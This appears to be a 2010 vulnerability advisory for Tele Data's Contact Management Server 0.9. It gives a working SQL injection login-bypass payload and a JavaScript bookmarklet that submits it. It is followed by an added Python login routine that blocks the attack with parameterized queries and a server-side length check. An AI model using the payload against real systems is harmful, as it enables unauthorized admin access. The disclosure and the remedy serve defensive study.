Tele Data's CMS version 0.9 suffers from a remote SQL injection vulnerability.
|=================================================================================================|
| |
| Vulnerability............SQL Injection |
| Software.................Tele Data's Contact Management Server 0.9 |
| Download.................http://teledata.qc.ca/td_cms/TD_CMS_SETUPEX.exe |
| Date.....................4/28/10 |
| |
|=================================================================================================|
| |
| Site.....................http://cross-site-scripting.blogspot.com/ |
| Email....................john.leitch5@gmail.com |
| |
|=================================================================================================|
|
| ##Description##
|
| There isn't much in the way of security here. It's possible to log in with admin privileges by
| injecting SQL into the username field. As there are client-side length constraints in place for
| the username field, I packaged the exploit in some JavaScript for ease of use.
|
|
| ##Exploit##
|
| ' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--
|
|
| ##Proof of Concept##
|
| javascript:document.forms[0][0].setAttribute("value","' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--");document.forms[0].submit();
|
|=================================================================================================|
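
Added example, not part of the original advisory and not the vendor's code: a login check that closes the two weaknesses described above by binding the username as a query parameter and enforcing the length limit on the server. The `Username`, `Salt` and `IsAdmin` columns, the 32-character limit, the PBKDF2 password storage and the sample account are assumptions; only `Users`, `RecID` and `Password` come from the advisory.

```python
import hashlib
import hmac
import os
import sqlite3

MAX_USERNAME_LEN = 32   # assumed limit; the advisory does not state the real one
PBKDF2_ROUNDS = 100_000
# Username value quoted in the advisory, used here only as test input.
PAYLOAD = ("' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,"
           "2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--")

def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)

def make_db() -> sqlite3.Connection:
    """Constructed sample database; the schema is hypothetical."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users (RecID INTEGER PRIMARY KEY, Username TEXT UNIQUE,"
               " Salt BLOB, Password BLOB, IsAdmin INTEGER)")
    salt = os.urandom(16)
    db.execute("INSERT INTO Users (Username, Salt, Password, IsAdmin) VALUES (?, ?, ?, 1)",
               ("admin", salt, hash_password("constructed-sample-pw", salt)))
    return db

def login(db: sqlite3.Connection, username: str, password: str):
    """Return the user's RecID on success, None on any failure."""
    # Enforce the limit server-side: a browser-side length limit is advisory only.
    if not username or len(username) > MAX_USERNAME_LEN:
        return None
    # Placeholder binding: the username is data, never part of the SQL text.
    row = db.execute("SELECT RecID, Salt, Password FROM Users WHERE Username = ?",
                     (username,)).fetchone()
    if row is None:
        return None
    rec_id, salt, stored = row
    # Compare derived hashes in constant time; an empty stored value never matches.
    if stored and hmac.compare_digest(stored, hash_password(password, salt)):
        return rec_id
    return None

if __name__ == "__main__":
    db = make_db()
    print("valid login:", login(db, "admin", "constructed-sample-pw"))
    print("advisory payload:", login(db, PAYLOAD, ""))
    print("payload cut to the limit:", login(db, PAYLOAD[:MAX_USERNAME_LEN], ""))
```

The truncated payload passes the length check and still fails, because the bound parameter is compared as a literal username rather than parsed as SQL.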